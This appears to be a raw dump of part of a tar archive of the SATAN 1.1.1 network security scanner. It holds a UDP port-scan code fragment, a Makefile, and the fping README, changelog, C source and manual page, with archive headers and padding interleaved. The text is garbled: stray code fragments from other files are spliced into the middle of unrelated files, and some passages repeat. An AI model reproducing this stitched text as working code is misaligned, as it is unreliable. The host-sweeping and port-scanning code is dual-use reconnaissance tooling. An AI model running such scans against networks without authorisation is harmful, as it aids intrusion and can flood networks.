sizeof(sin)); probes_sent++; sp->pkts++; ring_prepend(&active_ports, (RING *) sp); /* * Reduce the sending window when the first retransmission happens. Back * off when retransmissions dominate. Occasional retransmissons will keep * the load unchanged. */ if (sp->pkts > 1) { .replies--; .if (soft_limit > hard_limit) { . soft_limit = (ports_busy + 1) / 2; .} else if (replies < 0 && avg_irt) { . soft_limit = 0.5 + 0.5 * (soft_limit + avg_rtt / avg_irt); . replies = soft_limit / 2; .} } } /* drop_port - release port info, update statistics */ drop_port(sp) struct port_info *sp; { ports_busy--; probes_done++; ring_detach((RING *) sp); ring_append(&dead_ports, (RING *) sp); /* * Increase the load when a sufficient number of probes succeeded. * Occasional retransmissons will keep the load unchanged. */ if (replies > soft_limit) { .replies = soft_limit / 2; .if (soft_limit < hard_limit) . soft_limit++; } } /* init_port_info - initialize port info pool */ init_port_info() { struct port_info *sp; port_info = (struct port_info *) mymalloc(hard_limit * sizeof(*port_info)); ring_init(&active_ports); ring_init(&dead_ports); for (sp = port_info; sp < port_info + hard_limit; sp++) .ring_append(&dead_ports, (RING *) sp); } /* find_port_info - lookup port info */ struct port_info *find_port_info(port) int port; { struct port_info *sp; for (sp = (struct port_info *) ring_succ(&active_ports); . sp != (struct port_info *) & active_ports; . sp = (struct port_info *) ring_succ((RING *) sp)) .if (sp->port == port) . return (sp); return (0); } with some * Cisco routers and with Solaris 2.4. The first reply will come fast; * subsequent psatan-1.1.1/src/port_scan/Makefile.................................................................. 600 . 465 . 506 . 1623 5741307242 12116. .................................................................................. ................................................................................................................................................................................................................................................................. .................SHELL.= /bin/sh BIN.= ../../bin TCP_SRC.= tcp_scan.c find_addr.c mallocs.c non_blocking.c \ ..print_data.c open_limit.c error.c strerror.c TCP_OBJ.= tcp_scan.o find_addr.o mallocs.o non_blocking.o \ ..print_data.o open_limit.o error.o strerror.o UDP_SRC.= udp_scan.c find_addr.c mallocs.c open_limit.c error.c ring.c \ ..strerror.c UDP_OBJ.= udp_scan.o find_addr.o mallocs.o open_limit.o error.o ring.o \ ..strerror.o CFLAGS.= -O $(XFLAGS) FILES.= README tcp_scan.1 error.c find_addr.c lib.h makefile mallocs.c \ .non_blocking.c open_limit.c print_data.c tcp_scan.c udp_scan.c ring.c \ .strerror.o PROGS.= $(BIN)/tcp_scan $(BIN)/udp_scan #LIBS.= -lsocket -lnsl all: $(PROGS) $(BIN)/tcp_scan: $(TCP_OBJ) .$(CC) $(CFLAGS) -o $@ $(TCP_OBJ) $(LIBS) $(BIN)/udp_scan: $(UDP_OBJ) .$(CC) $(CFLAGS) -o $@ $(UDP_OBJ) $(LIBS) shar: .@shar $(FILES) lint: .lint $(TCP_SRC) .lint $(UDP_SRC) clean: .rm -f *.o $(PROGS) core es_done++; ring_detach((RING *) sp); ring_append(&dead_ports, (RING *) sp); /* * Increase tsatan-1.1.1/src/fping/.............................................................................. 700 . 465 . 506 . 0 5742521555 7506. .................................................................................... ................................................................................................................................................................................................................................................................. ...............satan-1.1.1/src/fping/README........................................................................ 600 . 465 . 506 . 4436 5731724667 10473. ...................................................................................... ................................................................................................................................................................................................................................................................. ............. fping - A tool to quickly ping N number of hosts to determine their reachability without flooding the network. Roland J. Schemers III - Stanford University schemers@Slapshot.Stanford.EDU fping is a ping(1) like program which uses the Internet Control Message Protocol (ICMP) echo request to determine if a host is up. fping is different from ping in that you can specify any number of hosts on the command line, or specify a file containing the lists of hosts to ping. Instead of trying one host until it timeouts or replies, fping will send out a ping packet and move on to the next host in a round-robin fashion. If a host replies, it is noted and removed from the list of hosts to check. If a host does not respond within a certain time limit and/or retry limit it will be considered unreachable. Site Stanford University has a large TCP/IP network with over 12,000 assigned IP addresses and over 100 IP subnets. Problem and Issues With a large a number of IP addresses in use, its becomes more and more time consuming to check on which IP addresses are actively in use, and which critical machines (routers, bridges, servers, etc) are reachable. One example is we have a program which goes through all of our routers arp caches looking for IP addresses that are in use. After finding a list of IP addresses that aren't in any arp caches fping can then be used to see if these IP addresses really aren't being used, or are just behind the routers. Checking 2500 hosts (99% of which are unreachable) via ping can take hours. Solution fping was written to solve the problem of pinging N number of hosts in an efficient manner. By sending out pings in a round-robin fashion and checking on responses as they come in at random, a large number of hosts can be checked at once. Checking 2500 hosts (5 packets per host, 10 msec between ping packets) takes under 3 minutes. Also, using fping to check 30 routers that are currently reachable takes about 420 milliseconds (elapsed real time). Unlike ping, fping is meant to be used in scripts and its output is easy to parse. ge :../* adopt initial rtt */ .. average(age, avg_rtt));./* normal processing */ avg_irt = (avg_irt == 0 ? 1 :../* prepare for irt ...... * calibration */ . avg_irt == 1 ? irt :../* adopt initial irt */ . avesatan-1.1.1/src/fping/CHANGES....................................................................... 600 . 465 . 506 . 5610 5731724667 10601. .......................................................................................... ................................................................................................................................................................................................................................................................. .........* Revision 1.20 1993/02/23 00:16:38 schemers fixed syntax error (should have compiled before checking in...) * Revision 1.19 1993/02/23 00:15:15 schemers turned off printing of "is alive" when -a is specified. * Revision 1.18 1992/07/28 15:16:44 schemers added a fflush(stdout) call before the summary is sent to stderr, so everything shows up in the right order. * Revision 1.17 1992/07/23 03:29:42 schemers * Revision 1.16 1992/07/22 19:24:37 schemers Fixed declaration of timeval_diff. Didn't notice the problem because I use 'cc' in stead of gcc under Ultrix. Time to switch? :-) Modified file reaing so it would skip blank lines or lines starting with a '#'. Now you can do something like: fping -ad < /etc/hosts * Revision 1.15 1992/07/21 17:07:18 schemers Put in sanity checks so only root can specify "dangerous" options. Changed usage to show switchs in alphabetical order. * Revision 1.14 1992/07/21 16:40:52 schemers * Revision 1.13 1992/07/17 21:02:17 schemers Changed the default timeout to 2500 msec, and retry to 3. This was due to suggestions from people with slow (WAN) networks. The default 1 sec timeout was too fast. Added '-e' option for showing elapsed (round-trip) times on pakets, and modified the -s option to include min, max, and average round-trip times, and over all elapsed time. Modified action taken when a error is returned from sendto. The action taken now considers the host unreachable and prints the hostname followed by the errno message. The program will not exit and will continue to try other hosts. * Revision 1.12 1992/07/17 16:38:54 schemers * Revision 1.11 1992/07/17 16:28:38 schemers move socket create call so I could do a setuid(getuid()) before the fopen call is made. Once the socket is created root privs aren't needed to send stuff out on it. moved num_timeout counter. It really was for debug purposes and didn't make sense to the general public :-) Now it is the number of timeouts (pings that didn't get received with the time limit). * Revision 1.10 1992/07/16 16:24:38 schemers * Revision 1.9 1992/07/16 16:00:04 schemers * Revision 1.8 1992/07/16 05:44:41 schemers Added _NO_PROTO stuff for older compilers, and _POSIX_SOURCE for unistd.h, and _POSIX_SOURCE for stdlib.h. Also added check for __cplusplus. Now compiles ok under Ultrix 3.1, and Sun4 using cc. Also compiled ok using g++ 2.2.2. Changed '-a' and '-u' flags to be mutually exclusive (makes sense, since specifiying both '-a' and '-u' is the same as not specifiying anything. Since '-a' and '-u' are mutually exclusive, these options now only print the hostname, and not the 'is alive' or 'is unreachable' messages. This makes it much easier to do stuff like: #!/usr/local/bin/perl $hosts_to_backup=`cat /etc/hosts.backup|fping -a`; Since you don't have to strip off the 'is alive' messages. Changed usage to and stats to print to stderr instead of stdout. == 0 ? 1 :../* prepare for irt ...... * calibration */ . avg_irt == 1 ? irt :../* adopt initial irt */ . avesatan-1.1.1/src/fping/fping.c....................................................................... 600 . 465 . 506 . 55310 5740012232 11051. .......................................................................................... ................................................................................................................................................................................................................................................................. ........./* * fping: fast-ping, file-ping * * Used to send out ping requests to a list of hosts in a round robin * fashion. * * * fping has been compiled tested under the following systems: * * Ultrix 4.2a DECstation * Ultrix 3.1 VAX * NeXT 2.1 * SunOS 4.1.1 Sparcstation (gcc and cc) * AIX 3.1 RISC System/6000 * */ /* *************************************************** * * Standard RCS Header information (see co(1)) * * $Author: schemers $ * * $Date: 1993/02/23 00:16:38 $ * * $Revision: 1.20 $ * * $Locker: schemers $ * * $Source: /networking/src/fping/RCS/fping.c,v $ * * $State: Exp $ * * $Log: fping.c,v $ * Revision 1.20 1993/02/23 00:16:38 schemers * fixed syntax error (should have compiled before checking in...) * * Revision 1.19 1993/02/23 00:15:15 schemers * turned off printing of "is alive" when -a is specified. * * Revision 1.18 1992/07/28 15:16:44 schemers * added a fflush(stdout) call before the summary is sent to stderr, so * everything shows up in the right order. * * Revision 1.17 1992/07/23 03:29:42 schemers * fixed declaration of timeval_diff. * * Revision 1.16 1992/07/22 19:24:37 schemers * Modified file reading so it would skip blanks lines or lines starting * with a '#'. Now you can do something like: * * fping -ad < /etc/hosts * * Revision 1.15 1992/07/21 17:07:18 schemers * Put in sanity checks so only root can specify "dangerous" options. * Changed usage to show switchs in alphabetical order. * * Revision 1.14 1992/07/21 16:40:52 schemers * Now when sendto returns an error, the host is considered unreachable and * and the error message (from errno) is displayed. * * Revision 1.13 1992/07/17 21:02:17 schemers * changed default timeout to 2500 msec (for WANs), and default try * to 3. This gives 10 second overall timeout. * * Added -e option for showing elapsed (round-trip) time on packets * * Modified -s option to inlude to round-trip stats * * Added #ifndef DEFAULT_* stuff its easier to change the defaults * * Reorganized main loop. * * cleaned up timeval stuff. removed set_timeval and timeval_expired * since they aren't needed anymore. Just use timeval_diff. * * Revision 1.12 1992/07/17 16:38:54 schemers * move socket create call so I could do a setuid(getuid()) before the * fopen call is made. Once the socket is created root privs aren't needed * to send stuff out on it. * * Revision 1.11 1992/07/17 16:28:38 schemers * moved num_timeout counter. It really was for debug purposes and didn't * make sense to the general public :-) Now it is the number of timeouts * (pings that didn't get received with the time limit). * * Revision 1.10 1992/07/16 16:24:38 schemers * changed usage() to use fprintf(stderr,"..."); * * Revision 1.9 1992/07/16 16:00:04 schemers * Added _NO_PROTO stuff for older compilers, and _POSIX_SOURCE * for unistd.h, and _POSIX_SOURCE for stdlib.h. Also added * check for __cplusplus. * * Revision 1.8 1992/07/16 05:44:41 schemers * changed -a and -u to only show hostname in results. This is * for easier parsing. Also added -v flag * * Revision 1.7 1992/07/14 18:45:23 schemers * initialized last_time in add_host function * * Revision 1.6 1992/07/14 18:32:40 schemers * changed select to use FD_ macros * * Revision 1.5 1992/07/14 17:21:22 schemers * standardized exit status codes * * Revision 1.4 1992/06/26 15:25:35 schemers * changed name from rrping to fping * * Revision 1.3 1992/06/24 15:39:32 schemers * added -d option for unreachable systems * * Revision 1.2 1992/06/23 03:01:23 schemers * misc fixes from R.L. "Bob" Morgan * * Revision 1.1 1992/06/19 18:23:52 schemers * Initial revision * *-------------------------------------------------- * Copyright (c) 1992 Board of Trustees * Leland Stanford Jr. University *************************************************** */ /* * Redistribution and use in source and binary forms are permitted * provided that the above copyright notice and this paragraph are * duplicated in all such forms and that any documentation, * advertising materials, and other materials related to such * distribution and use acknowledge that the software was developed * by Stanford University. The name of the University may not be used * to endorse or promote products derived from this software without * specific prior written permission. * THIS SOFTWARE IS PROVIDED ``AS IS'' AND WITHOUT ANY EXPRESS OR * IMPLIED WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED * WARRANTIES OF MERCHANTIBILITY AND FITNESS FOR A PARTICULAR PURPOSE. */ #ifndef _NO_PROTO #if !__STDC__ && !defined(__cplusplus) && !defined(FUNCPROTO) \ && !defined(_POSIX_SOURCE) #define _NO_PROTO #endif /* __STDC__ */ #endif /* _NO_PROTO */ #ifdef __cplusplus extern "C" { #endif #include <stdio.h> #include <errno.h> #include <time.h> #ifdef _POSIX_SOURCE #include <unistd.h> #endif #ifdef __STDC__ #include <stdlib.h> #endif #include <string.h> #include <sys/types.h> #include <sys/time.h> #include <sys/socket.h> #include <netinet/in_systm.h> #include <netinet/in.h> #include <netinet/ip.h> #include <netinet/ip_icmp.h> #include <arpa/inet.h> #include <netdb.h> /* RS6000 has sys/select.h */ #ifndef FD_SET #include <sys/select.h> #endif /* externals */ extern char *optarg; extern int optind,opterr; #ifndef SYS_ERRLIST_DECLARED extern char *sys_errlist[]; #endif #ifdef __cplusplus } #endif /* constants */ #ifndef DEFAULT_INTERVAL #define DEFAULT_INTERVAL 25 /* default time between packets (msec) */ #endif #ifndef DEFAULT_TIMEOUT #define DEFAULT_TIMEOUT 2500 /* individual host timeouts */ #endif #ifndef DEFAULT_RETRY #define DEFAULT_RETRY 3 /* number of times to retry a host */ #endif /* typedef's */ /* entry used to keep track of each host we are pinging */ typedef struct host_entry { char *host; /* text description of host */ struct sockaddr_in saddr; /* internet address */ int i; /* index into array */ int num_packets_sent; /* number of ping packets sent */ struct host_entry *prev,*next; /* doubly linked list */ struct timeval last_time; /* time of last packet sent */ } HOST_ENTRY; /* globals */ HOST_ENTRY *rrlist=NULL; /* linked list of hosts be pinged */ HOST_ENTRY **table=NULL; /* array of pointers to items in the list */ HOST_ENTRY *cursor; char *prog; int ident; /* our pid */ int s; /* socket */ int retry = DEFAULT_RETRY; int timeout = DEFAULT_TIMEOUT; int interval = DEFAULT_INTERVAL; long max_reply=0; long min_reply=10000; int total_replies=0; double sum_replies=0; struct timeval timeout_timeval; struct timezone tz; int num_waiting=0; /* number of hosts we are pinging */ int num_hosts; /* total number of hosts */ int num_alive=0, /* total number alive */ num_unreachable=0, /* total number unreachable */ num_noaddress=0; /* total number of addresses not found */ int num_timeout=0, /* number of times select timed out */ num_pingsent=0, /* total pings sent */ num_pingreceived=0; /* total pings received */ struct timeval current_time; /* current time (pseudo) */ struct timeval start_time; struct timeval end_time; /* switches */ int verbose_flag,dns_flag,stats_flag,unreachable_flag,alive_flag; int elapsed_flag,version_flag; char *filename=NULL; /* file containing hosts to ping */ /* forward declarations */ #ifdef _NO_PROTO void add_host(); void crash_and_burn(); void errno_crash_and_burn(); char *get_host_by_address(); int in_cksum(); int recvfrom_wto (); void remove_job(); void send_ping(); void usage(); int wait_for_reply(); long timeval_diff(); #else void add_host(char *host); void crash_and_burn(char *message); void errno_crash_and_burn(char *message); char *get_host_by_address(struct in_addr in); int in_cksum(u_short *p, int n); int recvfrom_wto (int s, char *buf, int len, struct sockaddr *saddr, int timo); void remove_job(HOST_ENTRY *h); void send_ping(int s,HOST_ENTRY *h); long timeval_diff(struct timeval *a,struct timeval *b); void usage(); int wait_for_reply(); #endif #define bcopy(s,d,l).memcpy(d,s,l) #define bzero(d,l).memset(d,0,l) #ifdef _NO_PROTO int main(argc,argv) int argc; char **argv; #else int main(int argc, char **argv) #endif { int c; struct protoent *proto; /* check if we are root */ if (geteuid()) { fprintf(stderr, "This program can only be run by root, or it must be setuid root.\n"); exit(3); } if ((proto = getprotobyname("icmp")) == NULL) crash_and_burn("icmp: unknown protocol"); /* create the socket here as root. Then setuid back to the person running the program. This is so they can't open a file that doesn't belong to them! */ s = socket(AF_INET, SOCK_RAW, proto->p_proto); if (s<0) errno_crash_and_burn("can't create raw socket"); setuid(getuid()); prog = argv[0]; ident = getpid() & 0xFFFF; verbose_flag=1; opterr=0; while ((c = getopt(argc,argv,"edhqusavt:i:f:r:")) != EOF) switch (c) { . case 't': if ( (timeout=atoi(optarg)) <0) usage(); break; . case 'f': filename= optarg; break; . case 'r': if ((retry=atoi(optarg))<0) usage(); break; . case 'i': if ((interval=atoi(optarg))<0) usage(); break; . case 'h': usage(); break; . case 'q': verbose_flag = 0;. break; . case 'e': elapsed_flag = 1;. break; . case 'd': dns_flag = 1; break; . case 's': stats_flag = 1; break; . case 'u': unreachable_flag = 1; break; . case 'a': alive_flag = 1; break; case 'v': printf("%s: $Revision: 1.20 $ $Date: 1993/02/23 00:16:38 $\n",argv[0]); printf("%s: comments to schemers@Stanford.EDU\n",argv[0]); exit(0); default : fprintf(stderr,"Unknown flag: %s\n",argv[0]); usage(); break; } if (unreachable_flag && alive_flag) { fprintf(stderr,"%s: specify only one of a,u\n",argv[0]); usage(); } if ( (interval<10 || retry >20 || timeout <250) && getuid()) { fprintf(stderr,"%s: these options are too risky for mere mortals.\n",prog); fprintf(stderr,"%s: You need i >=10, retry < 20, and t >= 250\n",prog); exit(3); } if (alive_flag || unreachable_flag) verbose_flag=0; argv = &argv[optind]; if (*argv && filename) { usage(); } if (!*argv && !filename) { filename = "-"; } if (*argv) while (*argv) { add_host(*argv); ++argv; } else if (filename) { FILE *ping_file; char line[132]; char host[132],*p; if (strcmp(filename,"-")==0) { ping_file=fdopen(0,"r"); } else { ping_file=fopen(filename,"r"); } if (!ping_file) errno_crash_and_burn("fopen"); while(fgets(line,132,ping_file)) { sscanf(line,"%s",host); if ((!*host) || (host[0]=='#')) /* magic to avoid comments */ continue; p=(char*)malloc(strlen(host)+1); if (!p) crash_and_burn("can't malloc host"); strcpy(p,host); add_host(p); } fclose(ping_file); } else usage(); if (!num_hosts) exit(2); /* allocate array to hold outstanding ping requests */ table = (HOST_ENTRY **) malloc(sizeof(HOST_ENTRY *)*num_hosts); if (!table) crash_and_burn("Can't malloc array of hosts"); cursor=rrlist; for( num_waiting=0; num_waiting < num_hosts; num_waiting++ ) { table[num_waiting]=cursor; cursor->i = num_waiting; cursor=cursor->next; } gettimeofday(&start_time,&tz); cursor=rrlist; while (num_waiting) { /* while pings are outstanding */ if ( (timeval_diff(¤t_time,&cursor->last_time)> timeout) || cursor->num_packets_sent==0) { if (cursor->num_packets_sent>0) num_timeout++; if (cursor->num_packets_sent == retry+1) { if(verbose_flag || unreachable_flag) { if (dns_flag) printf("%s", get_host_by_address(cursor->saddr.sin_addr)); else printf("%s",cursor->host); if (verbose_flag) printf(" is unreachable"); printf("\n"); .} num_unreachable++; remove_job(cursor); } else send_ping(s,cursor); . } while(wait_for_reply() && num_waiting) { /* call wfr until we timeout */ /* wait! */ } gettimeofday(¤t_time,&tz); if (cursor) cursor = cursor->next; } gettimeofday(&end_time,&tz); if (stats_flag) { fflush(stdout); fprintf(stderr,"\n"); fprintf(stderr," %8d hosts\n",num_hosts); fprintf(stderr," %8d alive\n",num_alive); fprintf(stderr," %8d unreachable\n",num_unreachable); fprintf(stderr," %8d unknown addresses\n",num_noaddress); fprintf(stderr,"\n"); fprintf(stderr," %8d timeouts (waiting for response)\n",num_timeout); fprintf(stderr," %8d pings sent\n",num_pingsent); fprintf(stderr," %8d pings received\n",num_pingreceived); fprintf(stderr,"\n"); if (total_replies==0) { min_reply=0; max_reply=0; total_replies=1; sum_replies=0; } fprintf(stderr," %8d msec (min round trip time)\n",min_reply); fprintf(stderr," %8d msec (avg round trip time)\n",(int)sum_replies/total_replies); fprintf(stderr," %8d msec (max round trip time)\n",max_reply); fprintf(stderr," %8.3f sec (elapsed real time)\n", . timeval_diff( &end_time,&start_time)/1000.0); fprintf(stderr,"\n"); } if (num_noaddress) exit(2); else if (num_alive != num_hosts) exit(1); exit(0); } /* * * Compose and transmit an ICMP_ECHO REQUEST packet. The IP packet * will be added on by the kernel. The ID field is our UNIX process ID, * and the sequence number is an index into an array of outstanding * ping requests. The sequence number will later be used to quickly * figure out who the ping reply came from. * */ #ifdef _NO_PROTO void send_ping(s,h) int s; HOST_ENTRY *h; #else void send_ping(int s,HOST_ENTRY *h) #endif { static char buffer[32]; struct icmp *icp = (struct icmp *) buffer; int n,len; gettimeofday(&h->last_time,&tz); icp->icmp_type = ICMP_ECHO; icp->icmp_code = 0; icp->icmp_cksum = 0; icp->icmp_seq = h->i; icp->icmp_id = ident; #define SIZE_ICMP_HDR 8 #define SIZE_PACK_SENT (sizeof(h->num_packets_sent)) #define SIZE_LAST_TIME (sizeof(h->last_time)) bcopy(&h->last_time,&buffer[SIZE_ICMP_HDR],SIZE_LAST_TIME); bcopy(&h->num_packets_sent, &buffer[SIZE_ICMP_HDR+SIZE_LAST_TIME], SIZE_PACK_SENT); len = SIZE_ICMP_HDR+SIZE_LAST_TIME+SIZE_PACK_SENT; icp->icmp_cksum = in_cksum( (u_short *)icp, len ); n = sendto( s, buffer, len, 0, (struct sockaddr *)&h->saddr, sizeof(struct sockaddr_in) ); if( n < 0 || n != len ) { if (verbose_flag || unreachable_flag) { if (dns_flag) printf("%s",get_host_by_address(h->saddr.sin_addr)); else printf("%s",cursor->host); if (verbose_flag) printf(" error while sending ping: %s\n", sys_errlist[errno]); printf("\n"); } num_unreachable++; remove_job(h); } else { h->num_packets_sent++; num_pingsent++; } } #ifdef _NO_PROTO int wait_for_reply() #else int wait_for_reply() #endif { int result; static char buffer[4096]; struct sockaddr_in response_addr; struct ip *ip; int hlen; struct icmp *icp; int n; HOST_ENTRY *h; long this_reply; int the_index; struct timeval sent_time; result=recvfrom_wto(s,buffer,4096, (struct sockaddr *)&response_addr,interval); if (result<0) { return 0; } /* timeout */ ip = (struct ip *) buffer; hlen = ip->ip_hl << 2; if (result < hlen+ICMP_MINLEN) { return(1); /* too short */ } icp = (struct icmp *)(buffer + hlen); if ( ( icp->icmp_type != ICMP_ECHOREPLY ) || ( icp->icmp_id != ident ) ) { return 1; /* packet received, but not the one we are looking for! */ } num_pingreceived++; if ( ( icp->icmp_seq >= num_hosts ) || ( !table[icp->icmp_seq] ) || ( table[icp->icmp_seq]->saddr.sin_addr.s_addr != response_addr.sin_addr.s_addr)) { return 1; /* packet received, don't about it anymore */ } n=icp->icmp_seq; h=table[n]; gettimeofday(¤t_time,&tz); bcopy(&icp->icmp_data[0],&sent_time,sizeof(sent_time)); bcopy(&icp->icmp_data[SIZE_LAST_TIME],&the_index, sizeof(the_index)); this_reply = timeval_diff(¤t_time,&sent_time); if (this_reply>max_reply) max_reply=this_reply; if (this_reply<min_reply) min_reply=this_reply; sum_replies += this_reply; total_replies++; if(verbose_flag||alive_flag) { if (dns_flag) printf("%s",get_host_by_address(response_addr.sin_addr)); else printf("%s",h->host); if (verbose_flag) printf(" is alive"); if (elapsed_flag) printf(" (%d msec)",this_reply); printf("\n"); } num_alive++; remove_job(h); /* remove job */ return num_waiting; } /* * Checksum routine for Internet Protocol family headers (C Version) * From ping examples in W.Richard Stevens "UNIX NETWORK PROGRAMMING" book. */ #ifdef _NO_PROTO int in_cksum(p,n) u_short *p; int n; #else int in_cksum(u_short *p, int n) #endif { register u_short answer; register long sum = 0; u_short odd_byte = 0; while( n > 1 ) { sum += *p++; n -= 2; } /* mop up an odd byte, if necessary */ if( n == 1 ) { *(u_char *)(&odd_byte) = *(u_char *)p; sum += odd_byte; } sum = (sum >> 16) + (sum & 0xffff);./* add hi 16 to low 16 */ sum += (sum >> 16);.../* add carry */ answer = ~sum;.../* ones-complement, truncate*/ return (answer); } /* add host to linked list of hosts to be pinged */ /* assume memory for *host is ours!!! */ #ifdef _NO_PROTO void add_host(host) char *host; #else void add_host(char *host) #endif { HOST_ENTRY *p; struct hostent *host_ent; struct in_addr *host_add; #ifndef __alpha u_long ipaddress = inet_addr(host); #else u_int ipaddress = inet_addr(host); #endif if ( (ipaddress == -1) && ( ((host_ent=gethostbyname(host)) == 0) || ((host_add = (struct in_addr *) *(host_ent->h_addr_list))==0)) ) { if (verbose_flag) fprintf(stderr,"%s address not found\n",host); num_noaddress++; return; } p = (HOST_ENTRY *) malloc(sizeof(HOST_ENTRY)); if (!p) crash_and_burn("can't allocate HOST_ENTRY"); p->host=host; p->num_packets_sent = 0; p->last_time.tv_sec =0; p->last_time.tv_usec =0; bzero((char*) &p->saddr, sizeof(p->saddr)); p->saddr.sin_family = AF_INET; if (ipaddress==-1) p->saddr.sin_addr = *host_add; else p->saddr.sin_addr.s_addr = ipaddress; if (!rrlist) { rrlist = p; p->next = p; p->prev = p; } else { p->next = rrlist; p->prev = rrlist->prev; p->prev->next = p; p->next->prev = p; rrlist = p; } num_hosts++; } #ifdef _NO_PROTO void remove_job(h) HOST_ENTRY *h; #else void remove_job(HOST_ENTRY *h) #endif { table[h->i]=NULL; --num_waiting; if (num_waiting) { /* remove us from list of jobs */ h->prev->next = h->next; h->next->prev = h->prev; if (h==cursor) { cursor = h-> next; } } else { cursor=NULL; rrlist=NULL; } } #ifdef _NO_PROTO char *get_host_by_address(in) struct in_addr in; #else char *get_host_by_address(struct in_addr in) #endif { struct hostent *h; h=gethostbyaddr((char *) &in,sizeof(struct in_addr),AF_INET); if (h==NULL || h->h_name==NULL) return inet_ntoa(in); else return h->h_name; } #ifdef _NO_PROTO void crash_and_burn(message) char *message; #else void crash_and_burn(char *message) #endif { if (verbose_flag) fprintf(stderr,"%s: %s\n",prog,message); exit(4); } #ifdef _NO_PROTO void errno_crash_and_burn(message) char *message; #else void errno_crash_and_burn(char *message) #endif { if (verbose_flag) fprintf(stderr,"%s: %s : %s\n",prog,message,sys_errlist[errno]); exit(4); } #ifdef _NO_PROTO long timeval_diff(a,b) struct timeval *a,*b; #else long timeval_diff(struct timeval *a,struct timeval *b) #endif { double temp; temp = (((a->tv_sec*1000000)+ a->tv_usec) - ((b->tv_sec*1000000)+ b->tv_usec))/1000; return (long) temp; } /* * recvfrom_wto: receive with timeout * returns length of data read or -1 if timeout * crash_and_burn on any other errrors * */ #ifdef _NO_PROTO int recvfrom_wto (s,buf,len, saddr, timo) int s; char *buf; int len; struct sockaddr *saddr; int timo; #else int recvfrom_wto (int s, char *buf, int len, struct sockaddr *saddr, int timo) #endif { int nfound,slen,n; struct timeval to; fd_set readset,writeset; to.tv_sec = timo/1000; to.tv_usec = (timo - (to.tv_sec*1000))*1000; FD_ZERO(&readset); FD_ZERO(&writeset); FD_SET(s,&readset); nfound = select(s+1,&readset,&writeset,NULL,&to); if (nfound<0) errno_crash_and_burn("select"); if (nfound==0) return -1; /* timeout */ slen=sizeof(struct sockaddr); n=recvfrom(s,buf,len,0,saddr,&slen); if (n<0) errno_crash_and_burn("recvfrom"); return n; } #ifdef _NO_PROTO void usage() #else void usage() #endif { fprintf(stderr,"\n"); fprintf(stderr,"Usage: %s [options] [systems...]\n",prog); fprintf(stderr," -a show systems that are alive\n"); fprintf(stderr," -d use dns to lookup address for return ping packet\n"); fprintf(stderr," -e show elapsed time on return packets\n"); fprintf(stderr," -f file read list of systems from a file ( - means stdin)\n"); fprintf(stderr," -i n interval (between ping packets) in milliseconds (default %d)\n",interval); fprintf(stderr," -q quiet (don't show per host results)\n"); fprintf(stderr," -r n retry limit (default %d)\n",retry); fprintf(stderr," -s dump final stats\n"); fprintf(stderr," -t n individual host timeout in milliseconds (default %d)\n",timeout); fprintf(stderr," -u show systems that are unreachable\n"); fprintf(stderr," -v show version\n"); fprintf(stderr," systems list of systems to check (if no -f specified)\n"); fprintf(stderr,"\n"); exit(3); } _addr *) *(host_ent->h_addr_list))==0)) ) { if (verbose_flag) fprintf(stderr,"%s address not found\n",host); num_noaddress++; return; } p = (HOST_ENTRY *) malloc(sizeof(HOST_ENTRY)); if (!p) crash_and_burn("can't allocate HOST_ENTRY"); p->host=host; p->num_pasatan-1.1.1/src/fping/fping.man..................................................................... 600 . 465 . 506 . 7470 5731724670 11406. .......................................................................................... ................................................................................................................................................................................................................................................................. ..........TH fping l .SH NAME fping \- send ICMP ECHO_REQUEST packets to network hosts .SH SYNOPSIS .B fping [ \fIoptions\fR ] [ \fIsystems...\fR ] .SH DESCRIPTION .NXR "fping command" .NXR "ICMP ECHO_REQUEST" .B fping is a .MS ping 8 like program which uses the Internet Control Message Protocol (ICMP) echo request to determine if a host is up. .B fping is different from ping in that you can specify any number of hosts on the command line, or specify a file containing the lists of hosts to ping. Instead of trying one host until it timeouts or replies, .B fping will send out a ping packet and move on to the next host in a round-robin fashion. If a host replies, it is noted and removed from the list of hosts to check. If a host does not respond within a certain time limit and/or retry limit it will be considered unreachable. .PP Unlike .MS ping 8 , .B fping is meant to be used in scripts and its output is easy to parse. .SH OPTIONS .IP \fB-a\fR 5 Show systems that are alive. .IP \fB-d\fR 5 Use DNS to lookup address of return ping packet. This allows you to give fping a list of IP addresses as input and print hostnames in the output. .IP \fB-e\fR 5 Show elapsed (round-trip) time of packets .IP \fB-f\fR 5 Read list of system from a file. .IP \fB-i\fIn\fR 5 The minimum amount of time (in milliseconds) between sending a ping packet to any host (default is 25). .IP \fB-q\fR 5 Quiet. Don't show per host results, just set final exit status. .IP \fB-r\fIn\fR 5 Retry limit (default 3). This is the number of times an attempt at pinging a host will be made, not including the first try. .IP \fB-s\fR 5 Dump final statistics. .IP \fB-t\fIn\fR 5 Individual host timeout in milliseconds (default 2500). This is the minimum number of milliseconds between ping packets directed towards a given host. .IP \fB-u\fR 5 Show systems that are unreachable. .B fping a list of IP addresses as input and have the results printed as hostnames. .SH EXAMPLES The following perl script will check a list of hosts and send mail if any are unreachable. It uses the open2 function which allows a program to be opened for reading and writing. fping does not start pinging the list of systems until it reads EOF, which it gets after INPUT is closed. Sure the open2 usage is not need in this example, but its a good open2 example none the less. .nf #!/usr/local/bin/perl require 'open2.pl'; $MAILTO = "root"; $pid = &open2("OUTPUT","INPUT","/usr/local/bin/fping -u"); @check=("slapshot","foo","foobar"); foreach(@check) { print INPUT "$_\\n"; } close(INPUT); @output=<OUTPUT>; if ($#output != -1) { chop($date=`date`); open(MAIL,"|mail -s 'unreachable systems' $MAILTO"); print MAIL "\\nThe following systems are unreachable as of: $date\\n\\n"; print MAIL @output; close MAIL; } .ni Another good example is when you want to perform an action only on hosts that are currently reachable. .nf #!/usr/local/bin/perl $hosts_to_backup = `cat /etc/hosts.backup | fping -a`; foreach $host (split(/\\n/,$hosts_to_backup)) { # do it } .ni .SH AUTHOR Roland J. Schemers III, Stanford University .SH DIAGNOSTICS Exit status is 0 if all the hosts are reachable, 1 if some hosts were unreachable, 2 if any IP addresses were not found, 3 for invalid command line arguments, and 4 for a system call failure. .SH BUGS Ha! If there were any I knew of I would have fixed them! .SH RESTRICTIONS If certain options are used (i.e, a low value for -i and -t, and a high value for -r) it is possible to flood the network. This program must be installed as setuid root in order to open up a raw socket, or must be run by root. In order to stop mere mortals from hosing the network (when fping is installed setuid root) , normal users can't specify the following: .nf -i n where n < 10 msec -r n where n > 20 -t n where n < 250 msec .ni .SH SEE ALSO netstat(1), ping(8), ifconfig(8c) p->prev = p; } else { p->next = rrlist; p->prev = rrlist->prev; 